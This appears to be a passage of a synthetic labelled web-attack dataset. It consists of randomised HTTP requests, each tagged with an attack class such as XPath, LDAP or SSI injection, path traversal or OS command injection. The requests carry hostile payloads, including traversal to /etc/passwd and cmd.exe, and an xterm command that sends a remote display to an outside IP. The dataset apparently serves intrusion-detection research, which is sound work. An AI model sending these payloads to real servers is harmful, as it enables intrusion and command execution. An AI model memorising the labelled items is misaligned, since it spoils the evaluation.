X-Serial-Number: 14019668167016941
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42559
Start - Id: 49395
class: XPathInjection
GET /htelt/cUTG/Ea5ssta3ErwfearfeslK/e16z_Jv0/2ZzdOt/rhSVeZHTjjQR9DoySIjH/oEqI6lggg/_VY4.jpeg?h-zL7=02&iedesgeutto=15+++or++++ai%2Fdsr9tg%2Fy4nd%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+or+++++5%3D&cazpeRyr17=%3D0s9bn&DOReC-Pgroup byJ=yT7Src6NphhQ&m7aoHe4pbEoiH=ju%3E6&tenu3toitirn=s+fntigdyut HTTP/1.0
Host: 124.125.224.210
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.0
Accept-Encoding: compress;q=0.9, gzip, identity;q=0.2
Accept-Language: otl-Neoelhw;q=0.2
Cache-Control: no-transform
Client-ip: 113.135.82.226
Cookie: rlIfo6=826115652;0go=sLZN;t8si=eixape2t;n:
Cookie2: $Version="461"
Date: Sat, 03 Jan 09 17:47:20 CET
ETag: W/"YzRB6BmYbIuVoxJQ"
Expect: 100-continue
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Wed, 01 Jun 05 05:12:35 UTC
If-Unmodified-Since: Tue, 20 Apr 10 21:15:22 CET
If-Match: *
If-None-Match: "WWPmW-e@TlzD-.W-WKI"
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 3237
MIME-Version: 9.6
Pragma: nkrreZi='ons'
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: Digest algorithm=MD5-sess
Range: 67912-847396,-254666,29-
Referer: http://www.utlaeU3e.org/tdswtnt4/eirrto.php
TE: chunked;q=0.6,deflate
Trailer: If-Range
User-Agent: Mozilla/9.2 (Machintosh; U; Mac OS X 6.0; id-c3; rv:7.5.4) Gecko/16105236
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6489x8625
Via: FTP/9.7 18.193.169.245, 9.0 www.Bhew6.tiff:250
Transfer-Encoding: t5jnee
Upgrade: goiteB/8.3
Warning: 199 www.s2an.css "moeybagoex" "Sat, 23 May 09 04:00:06 UTC"
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 9327975536472
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49395
Start - Id: 39242
class: SSI
GET /nuMhe5etdqra/TAaI.M8hbmyQvY/hhweeiihila0/1Oi/Dnprocessing-instructionmal_/tDnroigsaniivee0.pl?enieeiOfvh=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&tuofsi9toertO=9k9UOnjp&lfoewu=eew%24a&eehfcrao8oto=afwQMv%40Ot&hBelshinarrtNCe=ohyhpBoife9mwcpq HTTP/1.1
Host: www.4eeYcr.ch
Connection: close
Accept: */*
Accept-Charset: x-mac-korean;q=0.7, iso-8859-7
Accept-Encoding: 
Accept-Language: ettr-do, 5Ias3og-uau;q=0.1
Cache-Control: no-cache
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="614"
Date: Thu, 15 Oct 09 19:08:47 UTC
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: *
If-None-Match: "N.cmXCUp8aUw.1p8dC"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 059
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: /nceOggi/brlesrpy/ctdleeht/tfNeeeni/xhwt1m.bin
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.5 (Windows; U; Win98 3.2; gI-69; rv:6.6.8) Gecko/76846117
UA-CPU: PowerPC
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 8.5 www.rnRioU.jpeg
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39242
Start - Id: 48575
class: XPathInjection
POST /u0O@d032XGUeH/homeJ1naRformZZM/t.7bPGx/g5tsmwctimosImigaams/6RJ_geP65V7G.tiff? HTTP/1.1
Content-Length: 192
Content-Language: ermoiiu,7crul,enXr
Content-Encoding: deflate
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: dHNyZG53VWVlRWZod3J3ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 May 08 04:41:31 CET
Last-Modified: Sun, 11 May 08 21:32:25 CET
Host: www.243ums.ch
Connection: close
Accept: video/*, video/*;q=0.4, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.3, compress, deflate
Accept-Language: *;q=0.5
Cache-Control: min-fresh=2171
Client-ip: 163.106.24.253
Cookie: tdhsn=372;Gswp-uxI=ecopy%where;gy1UXbqDkhavingaU=4
Cookie2: $Version="47"
Date: Wed, 01 Feb 06 11:29:16 UTC
ETag: "GSCXoNh2vkhzld6.WL"
Expect: iJvsn=ronjlII
From: tatnungw@cltshcrl.be
If-Modified-Since: Thu, 19 Nov 09 06:23:42 GMT
If-Unmodified-Since: Sun, 15 May 05 19:01:21 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: Fri, 14 Nov 08 16:25:44 CET
Max-Forwards: 77
MIME-Version: 2.8
Pragma: rsiirpOc='9W'
Proxy-Authorization: Digest nonce
Authorization: Digest qop=auth-int
Range: 89-706195
Referer: /ucAcoanr/Qasomfgl/tmstW.mdb
TE: deflate;q=0.1
Trailer: Date
User-Agent: Mozilla/2.7 (compatible; rjmslao9o; Unix; iswusgSS)
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: hYtmiN
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ter=35877 or count(path/child::node()[position()=((i+j+k+l+1)]    |     path/child::*()[position()=(k+1)])=1     or   519=

End - Id: 48575
Start - Id: 44795
class: PathTransversal
GET /r7JxfcdongJ/e0rgnrqoriEfiv0hVit/xUeLCt/nYtt@PN_ZbkfALP4r/ue/tiesr/sshdtRnefrei/noXr.mdb?senored=113&Xjw45th645=2%5D%3Cilink&0da0v1LN2=ac3aynrz&6hys=file%3A%2F%2F%2F1%3A%2F49r%2FpiU%2F5ppkere.xml&nEisdh8r=oe7yH2sg&mjsnnstdG2=jHtsDCwlbgsoundkbihnbaocmdc&WuhajqseOm=400775&ttznraIsrteit=Erm%7Eepdl0d&DIh..wZtlink=01478613&lndieaedbjOdg=80767053&v@HechoL7Ilb8boot.ini=rlLWR_iM_3x HTTP/1.1
Host: 88.128.225.26
Connection: close
Accept: audio/basic, video/mpeg, video/quicktime;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: h4zrtcO-8gNsi;q=0.0, rre-hreec;q=0.0
Cache-Control: max-age=4974
Client-ip: 166.74.134.8
Cookie: utatoui=  iineIe5betweenfromp0nynRdor(;pamr=1tnfh;_8U9jLP=284855;gitsouI=wfnraetuyaoKhe;fieomesrsgh=elsformnahAnedaer\;5ai5ZdIGlJFM=petB7pcnkmCH
Cookie2: $Version="56"
Date: Tue, 11 Apr 06 09:16:25 UTC
ETag: W/"KXtCY0vftNKQfSIC"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Sun, 14 Dec 08 18:48:15 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: "recqCUxNclLJEVZDwYA"
If-Range: "xZiaEJ9hvofKfA-"
Max-Forwards: 239
MIME-Version: 7.4
Pragma: ow6lg='nt'
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=http://www.LIst.org/Raue/prueq9y.cfm
Range: -31658,860-,84040-975982
Referer: /ttein/vHha.asp
TE: trailers
Trailer: Expect
User-Agent: nriauTheuu
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x165
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: deflate
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 4.75.179.74
X-Serial-Number: 2157159271334
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44795
Start - Id: 44993
class: PathTransversal
GET /5m4Elsz/rtYumnitrl6r/WlikeTP0/7ab9bmEimd3hii/cstietnzkO/v3yKLCD3/gTFSf/totiqqEp/uW53yxQpWlc.php4?yst=%2601%29tncf+Pryhcu&eiln=66825&ooheGxeeuaemd=ef%3Dwheret+h2kd&sejoheaamssf8G=hi&h9ndeDaa=2436&1daxEaOe=sn2tl&aencIairfla=37&e2nEojathhL=1&si=obQN&aKYyjwindow.openj=56305&3e8srnl3anoe=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&e0wRmd=aaan HTTP/1.1
Host: 38.163.222.60:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: shift_jis;q=0.9, macintosh, utf-8;q=0.7, koi8;q=0.6, windows-1250;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=9
Cookie: 0ajNC=0ttRrg(u i/o4t;eohkt=Ezetd
Cookie2: $Version="55"
Date: Mon, 12 Feb 07 20:40:29 GMT
From: SiHai3@Rl2imga.fr
If-Modified-Since: Tue, 08 Apr 08 22:08:46 GMT
If-Unmodified-Since: Wed, 15 Nov 06 06:33:53 CET
If-Match: *
If-None-Match: "rFepa2Mgx-zPRm7Lo8tP"
If-Range: Wed, 08 Feb 06 02:43:25 CET
Max-Forwards: 4373
MIME-Version: 6.7
Pragma: Erlbctap='ctsoedr'
Referer: /8ot9geBn.cgi
User-Agent: 7svd6oi (rmJBQjxD; dxGrbIY.; ohK4g3b; ndtGzgRDc)
Via: HTTP/2.7 252.177.48.235:50926, 2.9 208.200.131.38:7967
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44993
Start - Id: 49587
class: XPathInjection
GET /onYsohnOnhLMmaecie/dldhecN.htm?eN3euht=27839&ZFRroArH=ngroup+byf%2F+tvtt&Inostsnwlnb=1+or+++++tl%2Fiyf%2Fy2%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D47%5D+++or+++804%3D&Ne=0rtAlhsSnastAcr&pupae3ttx=81018628&VrE3m=720149 HTTP/1.0
Host: 122.93.160.164
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.0
Accept-Language: wi-wgzeadjz, ebhtrvd-vor;q=0.6, 4hso-Ick0ks;q=0.8, o-cmjeeeCy
Cache-Control: no-store
Client-ip: 173.161.30.244
Cookie: a3xeh=ttfroms?Na:ijp/;REetp=uia;hch56=19324202;C9openpspfbMESc=iesr7hypnaunionrexecu;u@PEmRlG2Za=262
Cookie2: $Version="81"
Date: Sun, 27 Mar 05 01:48:38 GMT
ETag: W/"PmcmEKRs84Qlqdnx_"
Expect: zaa9l=tqnd;iaotty
From: rmya@typuTon9h.uk
If-Modified-Since: Fri, 21 Sep 07 10:04:53 GMT
If-Unmodified-Since: Sat, 19 Nov 05 13:56:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: http://as3eDiet.uk/teat7/ezdhged/arbers.asmx
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: tpsdqa
UA-CPU: Sparc
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: HTTP/8.1 www.25toA.js, 2.6 www.ohauEowd.shtml, oleiuS/0.0 www.4luoogaY.htm
Transfer-Encoding: compress
Upgrade: plohr/0.2
Warning: 779 www.gAhk.jpeg "5swesRioi5" "Tue, 24 Nov 09 13:38:23 UTC"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49587
Start - Id: 37475
class: LdapInjection
GET /xyLK54YAGP8qhYiovN6/Zit/t4L9HZ/sjgN882/4dteraasaasaeo/lWeaoehcfsa/2T19SFw.autoexec/uhmynauRrwshc6nlme/i5o07YH/at-MY8ZKhg/xsbo.jsp?luv=D3Re&lshSpe8nmq=73&eocreieltdetiy=th&oon=z&hoc=4&fhAl=l9o&Rmt=9W5aJ8&onuLejkhctgHn=sa&zao5scnfhSLSe=26285595&illep=5800198&DYQF5sa=7 HTTP/1.0
Host: 28.81.109.245
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, deflate;q=0.8, identity;q=0.4
Accept-Language: f-nwsos, E-t, e-tiwaa;q=0.7
Cache-Control: edru='Ziio9td3'
Cookie: s5zniwo84rss7i=cmdraedc;I8eiatl4r=e;va2mfxttT=qbFpH0nNQm;-K.Ax=ak7WLNpC1;yeednrferun=) (   |  (lc=eJad*);Wphu0t6ch=ouautoexecr:9cq(bgsoundevIs)ztandde
Cookie2: $Version="9"
Date: Sun, 03 Jul 05 04:13:19 UTC
ETag: "F40ZP5Gqd7KFnZ8x@NSU"
If-Modified-Since: Wed, 01 Jul 09 12:18:20 CET
If-Unmodified-Since: Tue, 04 Jul 06 17:06:37 UTC
If-Match: "Yy9aYe0nxQQp-m-"
If-None-Match: *
Max-Forwards: 659
MIME-Version: 5.3
Pragma: dyf4Rg='shas'
Authorization: NTLM MTJzaXVzcERlZWQzbHQwZm44ZXRlZjByNmEyZW1jc2FkaGJzcDlRdGxibHRp
Referer: http://www.LmtoeiEo.ch/tenat/r6mhoi/vb8mejx.cfm
TE: chunked;q=0.7,trailers,trailers
User-Agent: Mozilla/2.1 (compatible; Konqueror/2.6; Windows NT; etIzkijsv)
Via: g0n1/8.7 238.15.101.7, 9.9 www.eraz.jpg, FTP/9.5 www.7O3P.htm
Transfer-Encoding: compress
X-Forwarded-For: 85.93.81.59
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37475
Start - Id: 48379
class: XPathInjection
GET /eIMMGN/nrlil/fLipee/rP7_8i4BN/httpwinnt_zTOXdocumentIFb5M/iWQQwb-YCg/c02ffM/positiontDZitetcNzPAAf/z4I-b/mCD3M_U6337.cgi?insert.HpML=erABwLRd&RshutdownzTT=yMM&xobt=%3Cn%27i%5DEgrmailo&5eco0ohnclo0tt2=indnTand%26Isad&raht8TcNanHn=ldn4iethFoemei&Yg8oeoEMteas=et7tnrsamAEpn%3F%2Bt&qaeeins=54&cusueHta=0tmp&niOeu1e=gthT1l%3Er&QTfhomef2where=t2nen HTTP/1.0
Host: www.lsvhundo.com
Connection: close
Accept: application/*;q=0.6
Accept-Charset: x-mac-chinesesimp, us-ascii, iso-8859-3, iso-10646-ucs-2;q=0.8, x-mac-cyrillic;q=0.8
Accept-Encoding: compress;q=0.1, deflate, compress, compress;q=0.3
Accept-Language: honshc']  |   P     |     //user[    name/text(    )=   'sI
Cache-Control: min-fresh=994
Client-ip: 242.182.104.226
Cookie: rgpultan=6497446;t44bet3icdhEs=426056;nlih2hseOslac=cq;eicg3ctuO1gdih=whjcvb8
Cookie2: $Version="038"
Date: Fri, 11 Nov 05 06:53:16 CET
ETag: W/"if_bhXhq7pmdtzX4R4N"
Expect: etrcit=rdglo;dAazrnm=Yi0l
From: rnjltn@certi8ho.ch
If-Modified-Since: Sat, 24 Jun 06 15:09:37 UTC
If-Unmodified-Since: Mon, 20 Oct 08 16:38:32 GMT
If-Match: *
If-None-Match: "RA4V5PYto0uopJT8O"
If-Range: *
Max-Forwards: 78
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest username="aOiaWnc"
Authorization: NTLM b2FPbXNyQzNka25ydHJzb2x0c2lhM3Bycm10Y2VjZXR5dGl0Z2l2Y3RhYW9leQ==
Referer: /i88lohci/regHtiw/mnE63r.tiff
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: ic3tohMp (etz5z9@aKt; cLzo3-; eWT@hQotuH)
UA-Disp: 0304,7705,8
UA-Pixels: 193x0725
Via: 6.4 www.eatAl.jpeg, ioleeq/9.0 www.inaoste.jpg, FTP/4.3 67.211.171.165
Transfer-Encoding: compress
Upgrade: x7int/9.3, ecge/6.0, 9hOS/7.9, Ipthab/8.6
Warning: 750 www.s5it.tiff "w1tzmadtlta" 
X-Serial-Number: 63375075404459251
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48379
Start - Id: 36453
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.tsyu3ono.it
Connection: ernL
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate, deflate, gzip;q=0.1, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=205
Client-ip: 144.216.33.215
Cookie: 8u9il-=en3liccboot.inin;heiSe3tnt3otent=imrtinromlrr2nuuPt;i2sInt=Is1;ewNoid=4561990207;eaesEbtWww=lvunfchctDiMtsia
Cookie2: $Version="920"
Date: Fri, 26 Nov 04 12:30:30 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 04 Apr 04 18:58:46 UTC
If-Unmodified-Since: Wed, 18 Jun 08 04:46:57 CET
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: /itenhE/ev2go.jsp
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.1 (X11; U; Open BSD i586 7.6; nx-3m; rv:3.3.7) Gecko/07660990
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x6469
Via: HTTP/3.5 www.b5e4.jpeg
Transfer-Encoding: compress
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36453
Start - Id: 44163
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.TswbDeeeia.biz:27250
Connection: keep-alive
Accept: image/*;q=0.1, text/xml, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: thla-emecl0ie;q=0.7, feagIp-8ims, r35it-iiodn2u4, H1Sh-9eroi1wt;q=0.3, ieeYtIl3-Hbyda3gy;q=0.3
Cache-Control: no-cache
Client-ip: 57.123.24.179
Cookie: dafn40oacsNpggH=tetcexecayttf]dwautoexecoc %e;R3cd1HoLepe=tNtShn;A9necwknetrn=mvar
Cookie2: $Version="13"
Date: Tue, 23 Aug 05 02:52:36 GMT
ETag: "fs5xbNlo-GIu_ej"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Wed, 16 Dec 09 17:22:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 2.1
Pragma: aoetD4=bs
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic VXZ3OGVlc2w6Z2I4Yg==
Range: -505167,7356-2483,524521-2393
Referer: /wxeSfhb.ace
TE: trailers
Trailer: Cache-Control
User-Agent: y.yJDYIo http://www.tvkizt.gov
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 9.4 45.12.135.237:5348
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44163
Start - Id: 46452
class: PathTransversal
POST /4PhezzbuSJ/eF.jTTY49G/SGJcNeu/mu.asmx? HTTP/1.1
Content-Length: 174
Content-Language: dcme
Content-Encoding: identity
Content-Location: /lSuUoo.jsp
Content-MD5: ZGxoN1VvYWVyZnFydGlyNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Feb 06 10:20:35 UTC
Last-Modified: Wed, 17 May 06 07:53:04 UTC
Host: www.vrplehD.ch
Connection: ncoi
Accept: application/*, video/quicktime, image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 25.53.81.232
Cookie: osmnsoeteya=libIeahpette3?;neoIdeyi=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;lfetcYLo=5nmochasm;6rnaaoypneo=6
Cookie2: $Version="192"
Date: Wed, 13 Dec 06 18:59:11 GMT
ETag: W/"fZjz@U791LTHRkqn"
From: ahepi@csnwoote5h.cz
If-Modified-Since: Fri, 17 Nov 06 04:53:16 GMT
If-Unmodified-Since: Tue, 19 Jun 07 11:08:23 UTC
If-Match: "aDzJmCkMd00Is@AjJcu"
If-None-Match: *
If-Range: *
Max-Forwards: 1995
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM VGlzNWVhcmJzOHM5c2F1TmV2RmFhbHNhbTdlb2V1c2VhbW50OQ==
Range: -69534,5-
Referer: /em3e/e3ajcnro.zip
TE: trailers,gzip,trailers
Trailer: If-Match
User-Agent: erb2 (mRMfje1; ohljAUZ; wzANBA; epwWJuI)
UA-CPU: MIPS
UA-Disp: 5969,209,16
UA-OS: Windows NT
UA-Color: color16
Via: 4.6 www.i5twlv.jpg, 4.1 198.174.77.72, 5.0 116.15.245.17
Transfer-Encoding: identity
Upgrade: nIj/5.3, nefeg/1.1, 7worrm/1.2, HIs/4.4, bl4/5.6
Warning: 806 www.otg3mlp.shtml "nhahtbt" "Wed, 05 May 10 01:40:34 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r8eesirhsbs=a%ba[&Me-DJB8stdinTj=e too&Itne6oHambfh7h=3&Yecu=8610480239&ClikeQC=ms10Trt&cE7ihuEdb2s=iopadmin&o4S=4160694&aet9rhtsh=fm&9ea9=a&yseklwim5iP=31lmthepasswdeon0

End - Id: 46452
Start - Id: 37015
class: LdapInjection
GET /atz7ARSTsH9e39.L03W/OVypsea_/of6i5neu/hSehcad/EZN1kMpositionCW/dM6gIe3VYUoVm0/omHRjsoHzYa-JfJ0I2/BrE4Qalleinput1x/kPf.jpg?SnInesd=nlen&mrschdmsgsd=123&JS5access_logu=6&duwcicguthsietr=oL8uYzZz7x&lItiat=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 199.197.107.47
Connection: keep-alive
Accept: text/plain;q=0.4, text/html, video/*;q=0.7
Accept-Charset: gb2312;q=0.2, x-mac-ce;q=0.0, koi8;q=0.2, windows-1254
Accept-Encoding: *
Accept-Language: shse1ts-ksj7p;q=0.1, i-eeNr;q=0.8, riHdu-tntbbTna, apn1a8d-kn, oalto-r8o;q=0.9
Cache-Control: only-if-cached
Client-ip: 37.233.198.38
Cookie: yteitqhn=yh4ra
Cookie2: $Version="83"
Date: Fri, 27 Apr 07 20:44:39 UTC
ETag: W/"NrDtJo599z-_lb2P"
Expect: sUyt3Hn=odaE
From: lg2re@t1gN.ch
If-Modified-Since: Wed, 28 Feb 07 12:02:45 GMT
If-Unmodified-Since: Thu, 27 Apr 06 14:55:32 GMT
If-Match: *
If-None-Match: "7H4gI5pCf3_gBNjbksw"
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 0307
MIME-Version: 6.2
Pragma: EChTej='clesO7t'
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Basic b2xlUkNzOmV5c29jcg==
Range: 11-,-9658
Referer: /cspgzae/attb6rj/mtta/0fnier.jpeg
TE: chunked;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/5.7 (compatible; fotdonppe; Solaris; i4ga0irea; s3loi; 6TcS4phdie)
UA-CPU: StrongARM
UA-Disp: 435,7970,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2678x798
Via: 4.1 250.216.195.141, HTTP/6.2 204.180.199.55:66
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37015
Start - Id: 43136
class: OsCommanding
GET /ryiuKtxotqIvpjW8N.css?tNaeBTgfHcutma=oafnnm4ftp9v&fnninnp=onhtre&yLqsTM=%7C+++++%2Fusr%2Fopenwin%2Fbin%2Fxterm%2B-display%2B160.85.84.230%3A0%2500&docHhansdiooeje=shom7+rndanpti&caOle8haSanLs=%3DebSe%3CuUignes&Motlevohmdu=ldmpositionwece%28iexif%5C HTTP/1.1
Host: 153.214.165.212
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, cp-950, windows-1251;q=0.7
Accept-Encoding: deflate, identity
Accept-Language: 7-yort;q=0.8, Oosgset-ib;q=0.0, qpsufs-elsbh;q=0.1
Cache-Control: only-if-cached
Client-ip: 143.187.208.131
Cookie: nloCthm='&ee+Ynhi-;tseddltuqhO=eZ@TITiw4cV
Cookie2: $Version="7"
Date: Thu, 20 Apr 06 16:24:07 CET
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: riuusi2e=neiyivtb
From: ndud@rzo8frE.cz
If-Modified-Since: Tue, 20 Oct 09 01:58:08 UTC
If-Unmodified-Since: Sat, 28 Nov 09 17:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Oct 08 16:51:39 UTC
Max-Forwards: 272
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: rates2 ipii1rie=esrrf
Range: 06-14835,74438-28398,3461-5
Referer: /hhmraOtu/huhnnia/frns/ielm.gif
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: t.Qvz.L http://www.sn8hib.org
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.8 www.mvd5jheh.js:04767, HTTP/4.2 161.95.194.78
Transfer-Encoding: pjyc
Upgrade: arlate/4.9, dxn6g/2.1, pi4tlo/0.5, cgu/2.4
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 413241650
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43136
Start - Id: 47406
class: XSS
